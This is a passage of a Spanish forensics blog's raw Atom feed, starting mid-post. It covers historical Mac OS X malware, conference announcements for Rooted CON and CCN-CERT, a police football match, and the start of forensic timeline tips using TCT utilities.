servicio,&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;es decir como conclusiones, Mac OSX al igual que todos los sistemas operativos tienen fallos de seguridad y por lo tanto hay que tenerlo en cuenta en un entorno familiar o profesional.&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;br /&gt;&lt;b&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;¿Tienen virus y troyanos los Mac?&amp;nbsp;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;Si. y aqui tenemos algunos ejemplos no muy lejanos (ejemplos sacados de &lt;a href="http://www.seguridadapple.com/2010/09/malware-mac-os-x-fantasia-o-realidad.html" style="color: blue;"&gt;Seguridad Apple&lt;/a&gt; pero que quiero volver a destacar):&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;br /&gt;- &lt;b&gt;Virus en Mac&lt;/b&gt; OS X: De las primeras pruebas de concepto de virus en Mac OS X hay que hablar de &lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2006-110217-1331-99"&gt;Macarena&lt;/a&gt;, un virus que infectaba los ficheros de una carpeta y del que se alertó en Febrero del año 2006. Era inofensivo, pero dejaba claro que el malware estaba llegando a Mac OS X.&lt;br /&gt;&lt;br /&gt;- &lt;b&gt;Rootkits en Mac&lt;/b&gt; OS X: Dino Dai Zovi, conocido experto de seguridad de gran reputación, publicó en el año 2009 las &lt;a href="http://static.trailofbits.com/bhusa2009/AdvancedMacOSXRootkits_BHUSA09.tar.gz"&gt;Mac OS X Advanced Rootkit Tools&lt;/a&gt;. Estas herramientas las utilizó para demostrar como se pueden crear rootkits y malware avanzado en los sistemas Mac OS X en las conferencias Black Hat USA 2009, dentro de su presentación "&lt;a href="http://trailofbits.com/2009/08/10/advanced-mac-os-x-rootkits/"&gt;Advanced Mac OS X Rootkits&lt;/a&gt;" &lt;br /&gt;&lt;br /&gt;- &lt;b&gt;Bootnets en Mac&lt;/b&gt; OS X: Utilizando uno de los caminos de infección más sencillos, La Piratería, en Abril del año 2009 se creo la primera botnet activa de equipos con Mac OS X. Para ello se modificó el paquete iWorks para meterlo troyanizado en las redes P2P. Los usuarios accedían a una copia modificada con malware de iWorks y Photoshop.&lt;br /&gt;&lt;a href="http://www.securitybydefault.com/2009/04/ibotnet-red-basada-en-macs-zombies.html"&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;- &lt;b&gt;Troyanos en Mac&lt;/b&gt; OS X: En Octubre del 2007 la firma &lt;a href="http://www.intego.com/news/ism0705.asp"&gt;Intengo alertaba de la existencia del troyano OSX.RSPlug.A&lt;/a&gt;, un malware que redirigía el tráfico de determinadas direcciones por medio de manipulaciones en el DNS, cambiando las direcciones de distintos dominios. Se colaba simulando ser un Codec que utilizaban los sitios de contenido adulto de pago para el visor de Quicktime.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¿Son seguras las aplicaciones?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Tanto como en tu Windows, depende de tu sentido común. Si te las bajas de tu Appstore o sitios de confianza son 'algo' mas seguras, pero como utilices P2P, pues ya sabes tienes un regalito como paso hace menos de un mes con la variante .F de Bookface, un gusano diseñado especialmente para convertirte en zombie. Aunque es algo antigua se ha proliferado de una forma especial mediante una infección original de los paquetes iWorks 09, photoshop y ahora en su nueva versión de safari.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusiones&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Todos&amp;nbsp; los sistemas operativos están desarrollados por personas y como tal somos humanos y como humanos cometemos fallos y el software por mucho que sea bonito, accesible, potente, robusto y escalable, lo hizo en algún momento un becario, programador junior, senior o jefe de proyecto y el que no se haya equivocado alguna vez en el desarrollo de un código que tire la primera primera piedra.&lt;br /&gt;&lt;br /&gt;Insisto no se trata de inmolar a Mac, solo que cuando un iMac, o un Mac entra en la empresa, por solo ser uno o dos no lo metemos en las politicas de seguridad de la empresa y por lo tanto son libres de todo. Seamos consecuentes todo sistema operativo y/o aplicaciones han de pasar por un severo análisis y dejarnos de llevar por la complacencia de 'esto es seguro por que lo es' ¿?&lt;br /&gt;&lt;br /&gt;El siguiente post 'Forensics Mac OSX. Carácteristicas de Mac OSX y requisitos para un forense (II)'&lt;br /&gt;&lt;br /&gt;Saludos lectores :-)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.bitdefender.com/VIRUS-1000566-en--MAC.OSX.Trojan.DNSChanger.A.html"&gt;&lt;/a&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-6791022664786659326?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/6791022664786659326/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=6791022664786659326' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6791022664786659326'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6791022664786659326'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/01/forensics-mac-osx-mitos-y-realidades-i.html' title='Forensics Mac OSX. Mitos y realidades (I)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/TT1Y0ulzEpI/AAAAAAAACZM/2zat_2BChVA/s72-c/isitsafe.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2278062222926916410</id><published>2010-12-24T11:32:00.000+01:00</published><updated>2010-12-24T11:32:28.170+01:00</updated><title type='text'>Rooted CON 2011</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_fWA7DVpD2eo/THvmNgXEUmI/AAAAAAAAAfM/tBWaHrCaWgk/s200/logorootedcon.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://4.bp.blogspot.com/_fWA7DVpD2eo/THvmNgXEUmI/AAAAAAAAAfM/tBWaHrCaWgk/s200/logorootedcon.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Esta semana se anunciaron los &lt;b&gt;primeros ponentes para Rooted CON 2011&lt;/b&gt;, incluso antes de que finalice el &lt;i&gt;&lt;a href="http://www.rootedcon.es/cfp.html"&gt;Call-For-Papers&lt;/a&gt;&lt;/i&gt;, vigente hasta el 31 de Diciembre de 2010.&lt;br /&gt;&lt;br /&gt;Es para mi un placer anunciaros que voy a asistir como ponente y como 'profe' en la próxima Rooted CON 2011.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Los primeros nombres seleccionados, elegidos por encontrarse entre los  mejor valorados de Rooted CON 2010 por parte de los asistentes son: &lt;b&gt;Joxean Koret&lt;/b&gt; (&lt;i&gt;Database Security Paradise&lt;/i&gt;), &lt;b&gt;Yo&lt;/b&gt; y &lt;b&gt;Eduardo Abril&lt;/b&gt; (charla titulada&lt;i&gt; Hospital Central - tus datos son mis datos&lt;/i&gt;) y &lt;b&gt;Chema Alonso&lt;/b&gt; (todavia no se sabe ¿hablará de la Foca?)&lt;br /&gt;&lt;br /&gt;La ponencia la voy a compartir con el 'petardo' y muy buen amigo Eduardo Abril, si, ese del humor ingles.&lt;br /&gt;&lt;br /&gt;Vamos a exponer una cosa chula o por lo menos eso creo, ya que va de una auditoría que realizamos tiempo atras a un hospital (hable de ello en un post) y en la que aplicamos ingenieria social con un exito rotundo. Os aseguro que os divertireis tanto como lo hicimos nosotros.&lt;br /&gt;&lt;br /&gt;Como 'profe' voy a impartir una clase sobre 'análisis forense en dispositivos móviles' y como en otras ocasiones contaré casos en los que me he encontrado.&lt;br /&gt;&lt;br /&gt;Lo dicho nos vemos en la Rooted!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2278062222926916410?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2278062222926916410/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2278062222926916410' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2278062222926916410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2278062222926916410'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/12/rooted-con-2011.html' title='Rooted CON 2011'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fWA7DVpD2eo/THvmNgXEUmI/AAAAAAAAAfM/tBWaHrCaWgk/s72-c/logorootedcon.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-8402798312552189817</id><published>2010-12-18T18:40:00.000+01:00</published><updated>2010-12-18T18:40:31.684+01:00</updated><title type='text'>Y yo sin jugar...(BIT vs GDT)</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Se aproxima la navidad, el turrón y esas cosas buenas para ganar kilos...y como no podía ser de otra forma el pasado viernes se celebró un partido fraternal de fútbol entre el Grupo de Delitos Telemáticos de la Guardia Civil y la Brigada de Investigación Tecnológica de la Policía Nacional.&lt;br /&gt;&lt;br /&gt;Como ya comenté en ocasiones anteriores estos dos cuerpos &lt;a href="http://conexioninversa.blogspot.com/2010/09/en-primera-linea-de-fuego.html"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;son la primera linea de fuego&lt;/span&gt;&lt;/a&gt; y de lo mejorcito que tenemos actualmente.&lt;br /&gt;&lt;br /&gt;Al final gano la BIT (Y yo sin jugar, cachis...)&lt;br /&gt;&lt;br /&gt;Quiero aprovechar desde estás lineas que la B.I.T ha lanzado (&lt;a href="http://www.facebook.com/GrupoDelitosTelematicos"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;al igual que ya hizo el Grupo de Delitos Telemáticos&lt;/span&gt;&lt;/a&gt;) su incursión en las redes sociales con el objeto de acercarse más al ciudadano y que este tenga oportunidad de denunciar de forma más sencilla y estar todos más seguros en Internet.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Este es el enlace:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.facebook.com/BrigadaInvestigacionTecnologica"&gt;http://www.facebook.com/BrigadaInvestigacionTecnologica&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Su misión consiste en obtener las pruebas, perseguir a los delincuentes y poner a unas y otros a disposición judicial. Sus herramientas son la formación continua de los investigadores, la colaboración de las más punteras instituciones públicas y privadas, la participación activa en los foros internacionales de cooperación policial y la colaboración ciudadana.&lt;br /&gt;&lt;br /&gt;Como siempre os animo a todos y todas a suscribirse a esta iniciativa y a colaborar todos contra la ciberdelincuencia.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Os dejo la foto (Cuidadín con esas barrigitas de famosa)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TQztY5dS5DI/AAAAAAAACZE/bw6zPc1Gy0I/s1600/bit_gdt+%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TQztY5dS5DI/AAAAAAAACZE/bw6zPc1Gy0I/s320/bit_gdt+%25281%2529.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-8402798312552189817?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/8402798312552189817/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=8402798312552189817' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8402798312552189817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8402798312552189817'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/12/y-yo-sin-jugarbit-vs-gdt_18.html' title='Y yo sin jugar...(BIT vs GDT)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/TQztY5dS5DI/AAAAAAAACZE/bw6zPc1Gy0I/s72-c/bit_gdt+%25281%2529.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1943751843964951567</id><published>2010-12-13T13:12:00.001+01:00</published><updated>2010-12-13T16:31:11.339+01:00</updated><title type='text'>¡¡ Nos vamos al CCN-CERT !!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TQYMprD7V4I/AAAAAAAACYY/9ROfo4E4lss/s1600/logo.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TQYMprD7V4I/AAAAAAAACYY/9ROfo4E4lss/s1600/logo.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Mañana me toca conferencia en el &lt;b&gt;CCN-CERT&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div align="justify"&gt;&lt;/div&gt;&lt;div align="justify"&gt;El  CCN-CERT es la Capacidad de Respuesta a incidentes de Seguridad de la  Información del Centro Criptológico Nacional (CCN), dependiente del  Centro Nacional de Inteligencia (CNI). Este servicio se creó a  principios de 2007 como CERT gubernamental español y está presente en  los principales foros internacionales en los que se comparte objetivos,  ideas e información sobre la seguridad de forma global.&amp;nbsp;&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="justify"&gt;En mi caso voy hablar sobre un troyano que roba información y la manda a diversos sitios en  Internet. Lo curioso del tema es que está realmente gestionado por un  panel de control que gestiona una botnet. Todavia mi equipo esta 'descifrando' parte del troyano y sera motivo seguramente de escribir un post sobre este curioso malware.&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="justify"&gt;También estarán muchos colegas conocidos, entre ellos David Barroso, Raul Siles, Olof Sandstrom, Marc Vilanova, José Antonio Mañas, Juan Vázquez y otros.&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="justify"&gt;&amp;nbsp;Aquí os dejo la agenda de mañana y desde este &lt;a href="https://www.ccn-cert.cni.es/index.php?option=com_content&amp;amp;view=article&amp;amp;id=2583&amp;amp;Itemid=198&amp;amp;lang=es%20"&gt;&lt;span style="color: blue;"&gt;link&lt;/span&gt; &lt;/a&gt;también se puede acceder.&lt;/div&gt;&lt;div align="justify"&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TQYJxDllG4I/AAAAAAAACYU/JKzBlG1vqW8/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TQYJxDllG4I/AAAAAAAACYU/JKzBlG1vqW8/s320/Captura.JPG" width="289" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1943751843964951567?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='https://www.ccn-cert.cni.es/index.php?option=com_content&amp;view=article&amp;id=2583&amp;Itemid=198&amp;lang=es' title='¡¡ Nos vamos al CCN-CERT !!'/><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1943751843964951567/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1943751843964951567' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1943751843964951567'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1943751843964951567'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/12/nos-vamos-al-ccn-cert.html' title='¡¡ Nos vamos al CCN-CERT !!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/TQYMprD7V4I/AAAAAAAACYY/9ROfo4E4lss/s72-c/logo.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-6180050623980208134</id><published>2010-12-05T18:25:00.002+01:00</published><updated>2010-12-05T18:40:13.396+01:00</updated><title type='text'>Tips &amp; Tricks (I)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TPvOP-gWxRI/AAAAAAAACYQ/XuEbLgO8QdQ/s1600/magia-hacer.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TPvOP-gWxRI/AAAAAAAACYQ/XuEbLgO8QdQ/s200/magia-hacer.jpg" width="185" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Muchos me preguntais sobre temas de extracción de datos y trucos que utilizo.&lt;br /&gt;&lt;br /&gt;Hace dias me paso lo mismo en un análisis forense y la verdad no me acordaba de un paso en concreto y tuve que poner imaginación para recordarlo, así que he decidido ponerlo en el blog, con objeto de recordarmelo a mi mismo y compartirlo con todos. (dedicado a FRAN de la &lt;a href="https://www.gdt.guardiacivil.es/webgdt/home_alerta.php" style="color: #3d85c6;"&gt;GDT&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Son pequeños trucos que utilizo de vez en cuando.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Creación de una línea de tiempo con las TCTUtils&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="text"&gt;Utilidades escritas por Brian Carrier: &lt;/div&gt;&lt;span class="text"&gt;&lt;b&gt;jBcat:&lt;/b&gt; Muestra el contenido de un bloque de disco a la salida estándar.&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt; &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="text"&gt;&lt;b&gt;blockcalc:&lt;/b&gt; Mapas entre las imágenes con dd y sus diferencias&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt; &lt;span class="text"&gt;&lt;b&gt;fls:&lt;/b&gt; Muestra entradas de ficheros y directorios que han sido borrados&lt;/span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;.&lt;/span&gt;&lt;/span&gt; &lt;span class="text"&gt;Usando fls con la opción-d hace una lista de los nombres de todos los archivos borrados en la imagen.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span class="text"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt; &lt;span class="text"&gt;&lt;b&gt;find_file:&lt;/b&gt; Determina qué archivo tiene asignado un inodo de una 